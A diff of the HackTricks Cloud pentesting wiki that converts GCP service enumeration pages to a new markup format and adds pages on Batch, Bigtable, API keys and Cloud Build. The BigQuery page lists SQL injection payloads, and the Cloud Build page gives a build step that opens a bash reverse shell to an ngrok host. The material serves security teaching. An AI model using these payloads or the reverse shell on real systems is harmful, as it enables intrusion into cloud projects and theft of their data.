- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/README.md b/src/pentesting-cloud/gcp-security/gcp-services/README.md similarity index 100% rename from pentesting-cloud/gcp-security/gcp-services/README.md rename to src/pentesting-cloud/gcp-security/gcp-services/README.md diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md new file mode 100644 index 000000000..7196bf8e7 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md @@ -0,0 +1,22 @@ +# GCP - AI Platform Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/) + +Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**. + +There are a few areas here you can look for interesting information like models and jobs. + +```bash +# Models +gcloud ai-platform models list +gcloud ai-platform models describe +gcloud ai-platform models get-iam-policy + +# Jobs +gcloud ai-platform jobs list +gcloud ai-platform jobs describe +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md new file mode 100644 index 000000000..5d13eca1c --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md 
@@ -0,0 +1,44 @@ +# GCP - API Keys Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data. + +### Restrictions + +You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP. + +### Enumeration + +It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe: + +```bash +gcloud services api-keys list +gcloud services api-keys describe +gcloud services api-keys list --show-deleted +``` + +> [!NOTE] +> It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys. + +### Privilege Escalation & Post Exploitation + +{{#ref}} +../gcp-privilege-escalation/gcp-apikeys-privesc.md +{{#endref}} + +### Unauthenticated Enum + +{{#ref}} +../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md +{{#endref}} + +### Persistence + +{{#ref}} +../gcp-persistence/gcp-api-keys-persistence.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md similarity index 59% rename from pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md index 3f78b88ec..0563fdb98 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md 
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md @@ -1,19 +1,6 @@ # GCP - App Engine Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -31,7 +18,7 @@ Google Cloud Platform's (GCP) App Engine is a **robust, serverless platform tail A simple **firewall** can be configured for the instances running the Apps with the following options: -
+
### SA @@ -43,15 +30,13 @@ The source code and metadata is **automatically stored in buckets** with names s **Every file** of the App is stored with the **sha1 of the content as filename**: -
+
Inside the **`ae`** folder from `staging..appspot.com`, **one folder per version exist** with the **source code** files and **`manifest.json`** file that **describes the components** of the App: -{% code overflow="wrap" %} ```json {"requirements.txt":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/a270eedcbe2672c841251022b7105d340129d108","sha1Sum":"a270eedc_be2672c8_41251022_b7105d34_0129d108"},"main_test.py":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/0ca32fd70c953af94d02d8a36679153881943f32","sha1Sum":"0ca32fd7_0c953af9_4d02d8a ... ``` -{% endcode %} ### Containers @@ -65,9 +50,8 @@ It might look like it's only possible to deploy 1 app engine web application per ### Enumeration -{% hint style="danger" %} -Every time you uploads a new code to the App, **a new version is created**. **All versions are stored** and they even have an **URL to access them**. So modifying the code of an old version could be a **great persistence technique**. -{% endhint %} +> [!CAUTION] +> Every time you uploads a new code to the App, **a new version is created**. **All versions are stored** and they even have an **URL to access them**. So modifying the code of an old version could be a **great persistence technique**. As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an **`app.yaml`** file which can be accessed as follows: 
@@ -108,39 +92,26 @@ gcloud app ssl-certificates describe ### Privilege Escalation -{% content-ref url="../gcp-privilege-escalation/gcp-appengine-privesc.md" %} -[gcp-appengine-privesc.md](../gcp-privilege-escalation/gcp-appengine-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-appengine-privesc.md +{{#endref}} ### Unauthenticated Enum -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md" %} -[gcp-app-engine-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md +{{#endref}} ### Post Exploitation -{% content-ref url="../gcp-post-exploitation/gcp-app-engine-post-exploitation.md" %} -[gcp-app-engine-post-exploitation.md](../gcp-post-exploitation/gcp-app-engine-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-post-exploitation/gcp-app-engine-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../gcp-persistence/gcp-app-engine-persistence.md" %} -[gcp-app-engine-persistence.md](../gcp-persistence/gcp-app-engine-persistence.md) -{% endcontent-ref %} +{{#ref}} +../gcp-persistence/gcp-app-engine-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md similarity index 54% rename from pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md index 43b6b86a4..493e8b2d5 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md @@ -1,19 +1,6 @@ # GCP - Artifact Registry Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -32,11 +19,11 @@ Key features of Artifact Registry include: When creating a new repository it's possible to **select a the format/type** of the repository among several like Docker, Maven, npm, Python... and the mode which usually can be one of these three: -* **Standard Repository**: Default mode for **storing your own artifacts** (like Docker images, Maven packages) directly in GCP. It's secure, scalable, and integrates well within the Google Cloud ecosystem. -* **Remote Repository** (if available): Acts as a proxy for **caching artifacts from external**, public repositories. It helps prevent issues from dependencies changing upstream and reduces latency by caching frequently accessed artifacts. -* **Virtual Repository** (if available): Provides a **unified interface to access multiple (standard or remote) repositories** through a single endpoint, simplifying client-side configuration and access management for artifacts spread across various repositories. - * For a virtual repository you will need to **select repositories and give them a priority** (the repo with the largest priority will be used). - * You can **mix remote and standard** repositories in a **virtual** one, if the **priority** of the **remote** is **bigger** than the standard, **packages from remote (PyPi for example) will be used**. This could lead to a **Dependency Confusion.** +- **Standard Repository**: Default mode for **storing your own artifacts** (like Docker images, Maven packages) directly in GCP. It's secure, scalable, and integrates well within the Google Cloud ecosystem. +- **Remote Repository** (if available): Acts as a proxy for **caching artifacts from external**, public repositories. It helps prevent issues from dependencies changing upstream and reduces latency by caching frequently accessed artifacts. 
+- **Virtual Repository** (if available): Provides a **unified interface to access multiple (standard or remote) repositories** through a single endpoint, simplifying client-side configuration and access management for artifacts spread across various repositories. + - For a virtual repository you will need to **select repositories and give them a priority** (the repo with the largest priority will be used). + - You can **mix remote and standard** repositories in a **virtual** one, if the **priority** of the **remote** is **bigger** than the standard, **packages from remote (PyPi for example) will be used**. This could lead to a **Dependency Confusion.** Note that in the **Remote version of Docker** it's possible to give a username and token to access Docker Hub. The **token is then stored in the Secret Manager**. @@ -46,8 +33,8 @@ As expected, by default a Google-managed key is used but a Customer-managed key ### Cleanup Policies -* **Delete artifacts:** Artifacts will be **deleted according to cleanup policy** criteria. -* **Dry run:** (Default one) Artifacts will **not be deleted**. Cleanup policies will be evaluated, and test delete events sent to Cloud Audit Logging. +- **Delete artifacts:** Artifacts will be **deleted according to cleanup policy** criteria. +- **Dry run:** (Default one) Artifacts will **not be deleted**. Cleanup policies will be evaluated, and test delete events sent to Cloud Audit Logging. ### Vulnerability Scanning 
@@ -80,39 +67,26 @@ gcloud artifacts docker images list-vulnerabilities projects//locatio ### Privilege Escalation -{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %} -[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-artifact-registry-privesc.md +{{#endref}} ### Unauthenticated Access -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md" %} -[gcp-artifact-registry-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md +{{#endref}} ### Post-Exploitation -{% content-ref url="../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md" %} -[gcp-artifact-registry-post-exploitation.md](../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %} -[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md) -{% endcontent-ref %} +{{#ref}} +../gcp-persistence/gcp-artifact-registry-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md new file mode 100644 index 000000000..9a8812bad --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md @@ -0,0 +1,35 @@ +# GCP - Batch Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations. + +### Service Account + +Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually). + +## Enumeration + +```bash +# List jobs +gcloud batch jobs list + +# Get job info +gcloud batch jobs describe --location + +# List tasks +gcloud batch tasks list --location --job + +# Gte info of tasks executions +gcloud batch tasks describe projects//locations//jobs//taskGroups//tasks/ +``` + +## Privilege Escalation + +{{#ref}} +../gcp-privilege-escalation/gcp-batch-privesc.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md similarity index 64% rename from pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md index e6154ba77..98db30a8b 100644 
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md @@ -1,19 +1,6 @@ # GCP - Bigquery Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -97,7 +84,7 @@ bq ls --row_access_policies :.
# Get row policies ### Columns Access Control -
+
To restrict data access at the column level: @@ -109,9 +96,8 @@ To restrict data access at the column level: When a user tries to access column data at query time, BigQuery **checks the column policy tag and its policy to see whether the user is authorized to access the data**. -{% hint style="success" %} -As summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag enforcing access control on the taxonomy of the tag. -{% endhint %} +> [!TIP] +> As summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag enforcing access control on the taxonomy of the tag. To enforce access control on the taxonomy it's needed to enable the service: @@ -121,17 +107,14 @@ gcloud services enable bigquerydatapolicy.googleapis.com It's possible to see the tags of columns with: -{% code overflow="wrap" %} ```bash bq show --schema :.
[{"name":"username","type":"STRING","mode":"NULLABLE","policyTags":{"names":["projects/.../locations/us/taxonomies/2030629149897327804/policyTags/7703453142914142277"]},"maxLength":"20"},{"name":"age","type":"INTEGER","mode":"NULLABLE"}] ``` -{% endcode %} ### Enumeration -{% code overflow="wrap" %} ```bash # Dataset info bq ls # List datasets @@ -170,7 +153,6 @@ bq show --location= show --format=prettyjson --job=true # Misc bq show --encryption_service_account # Get encryption service account ``` -{% endcode %} ### BigQuery SQL Injection 
@@ -178,89 +160,70 @@ For further information you can check the blog post: [https://ozguralp.medium.co **Comments**: -* `select 1#from here it is not working` -* `select 1/*between those it is not working*/` But just the initial one won't work -* `select 1--from here it is not working` +- `select 1#from here it is not working` +- `select 1/*between those it is not working*/` But just the initial one won't work +- `select 1--from here it is not working` Get **information** about the **environment** such as: -* Current user: `select session_user()` -* Project id: `select @@project_id` +- Current user: `select session_user()` +- Project id: `select @@project_id` Concat rows: -* All table names: `string_agg(table_name, ', ')` +- All table names: `string_agg(table_name, ', ')` Get **datasets**, **tables** and **column** names: -* **Project** and **dataset** name: +- **Project** and **dataset** name: -{% code overflow="wrap" %} ```sql SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA ``` -{% endcode %} -* **Column** and **table** names of **all the tables** of the dataset: +- **Column** and **table** names of **all the tables** of the dataset: -{% code overflow="wrap" %} ```sql # SELECT table_name, column_name FROM ..INFORMATION_SCHEMA.COLUMNS SELECT table_name, column_name FROM ..INFORMATION_SCHEMA.COLUMNS ``` -{% endcode %} -* **Other datasets** in the same project: +- **Other datasets** in the same project: -{% code overflow="wrap" %} ```sql # SELECT catalog_name, schema_name, FROM .INFORMATION_SCHEMA.SCHEMATA SELECT catalog_name, schema_name, NULL FROM .INFORMATION_SCHEMA.SCHEMATA ``` -{% endcode %} **SQL Injection types:** -* Error based - casting: `select CAST(@@project_id AS INT64)` -* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` -* Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#` -* Boolean based: ``' WHERE SUBSTRING((select 
column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#`` -* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000`` +- Error based - casting: `select CAST(@@project_id AS INT64)` +- Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` +- Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#` +- Boolean based: `` ' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'# `` +- Potential time based - Usage of public datasets example: `` SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000 `` **Documentation:** -* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators) -* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting) +- All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators) +- Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting) ### Privilege Escalation & Post Exploitation -{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %} -[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md) -{% endcontent-ref %} +{{#ref}} +../gcp-privilege-escalation/gcp-bigquery-privesc.md +{{#endref}} ### Persistence -{% content-ref url="../gcp-persistence/gcp-bigquery-persistence.md" %} 
-[gcp-bigquery-persistence.md](../gcp-persistence/gcp-bigquery-persistence.md) -{% endcontent-ref %} +{{#ref}} +../gcp-persistence/gcp-bigquery-persistence.md +{{#endref}} ## References -* [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro) +- [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
new file mode 100644
index 000000000..a4bcbbdbc
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
@@ -0,0 +1,32 @@
+# GCP - Bigtable Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
+
+A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
+
+```bash
+# Cloud Bigtable
+gcloud bigtable instances list
+gcloud bigtable instances describe
+gcloud bigtable instances get-iam-policy
+
+## Clusters
+gcloud bigtable clusters list
+gcloud bigtable clusters describe
+
+## Backups
+gcloud bigtable backups list --instance
+gcloud bigtable backups describe --instance
+gcloud bigtable backups get-iam-policy --instance
+
+## Hot Tables
+gcloud bigtable hot-tablets list
+
+## App Profiles
+gcloud bigtable app-profiles list --instance
+gcloud bigtable app-profiles describe --instance
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md
new file mode 100644
index 000000000..387f2272a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md
@@ -0,0 +1,171 @@
+# GCP - Cloud Build Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows.
+
+Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab).
+
+> [!TIP]
+> I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client.
+
+### Events
+
+The Cloud Build can be triggered if:
+
+- **Push to a branch**: Specify the branch
+- **Push a new tag**: Specify the tag
+- P**ull request**: Specify the branch that receives the PR
+- **Manual Invocation**
+- **Pub/Sub message:** Specify the topic
+- **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret
+
+### Execution
+
+There are 3 options:
+
+- A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml`
+  - Only one that can be specified “inline” in the web console and in the cli
+  - Most common option
+  - Relevant for unauthenticated access
+- A **Dockerfile** to build
+- A **Buildpack** to build
+
+### SA Permissions
+
+The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `@cloudbuild.gserviceaccount.com` will be **used.**
+
+By default no permissions are given but it's fairly easy to give it some:
+
+
+
+### Approvals
+
+It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default).
+
+### PR Approvals
+
+When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`.
+
+
+
+### Connections & Repositories
+
+Connections can be created over:
+
+- **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.**
+- **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret.
+- **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.**
+
+Once a connection is generated, you can use it to **link repositories that the Github account has access** to.
+
+This option is available through the button:
+
+
+
+> [!TIP]
+> Note that repositories connected with this method are **only available in Triggers using 2nd generation.**
+
+### Connect a Repository
+
+This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).**
+
+This option is available through the button:
+
+
+
+### Storage
+
+Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with:
+
+```bash
+git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
+  cd cloud-console-sample-build && \
+  gcloud builds submit --config cloudbuild.yaml --region=global
+```
+
+A Storage bucket called [security-devbox_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false&project=security-devbox) is created to store a `.tgz` with the files to be used.
+
+### Get shell
+
+```yaml
+steps:
+  - name: bash
+    script: |
+      #!/usr/bin/env bash
+      bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
+options:
+  logging: CLOUD_LOGGING_ONLY
+```
+
+Install gcloud inside cloud build:
+
+```bash
+# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
+curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
+mkdir -p /usr/local/gcloud
+tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
+/usr/local/gcloud/google-cloud-sdk/install.sh
+```
+
+### Enumeration
+
+You could find **sensitive info in build configs and logs**.
+
+```bash
+# Get configured triggers configurations
+gcloud builds triggers list # Check for the words github and bitbucket
+gcloud builds triggers describe
+
+# Get build executions
+gcloud builds list
+gcloud builds describe # Get even the build yaml if defined in there
+gcloud builds log # Get build logs
+
+# List all connections of each region
+regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
+for region in $regions; do
+  echo "Listing build connections in region: $region"
+  connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
+  if [[ ${#connections[@]} -eq 0 ]]; then
+    echo "No connections found in region $region."
+  else
+    for connection in $connections; do
+      echo "Describing connection $connection in region $region"
+      gcloud builds connections describe "$connection" --region="$region"
+      echo "-----------------------------------------"
+    done
+  fi
+  echo "========================================="
+done
+
+# List all worker-pools
+regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
+for region in $regions; do
+  echo "Listing build worker-pools in region: $region"
+  gcloud builds worker-pools list --region="$region"
+  echo "-----------------------------------------"
+done
+```
+
+### Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-cloudbuild-privesc.md
+{{#endref}}
+
+### Unauthenticated Access
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
new file mode 100644
index 000000000..6e808a158
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
@@ -0,0 +1,108 @@
+# GCP - Cloud Functions Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Functions
+
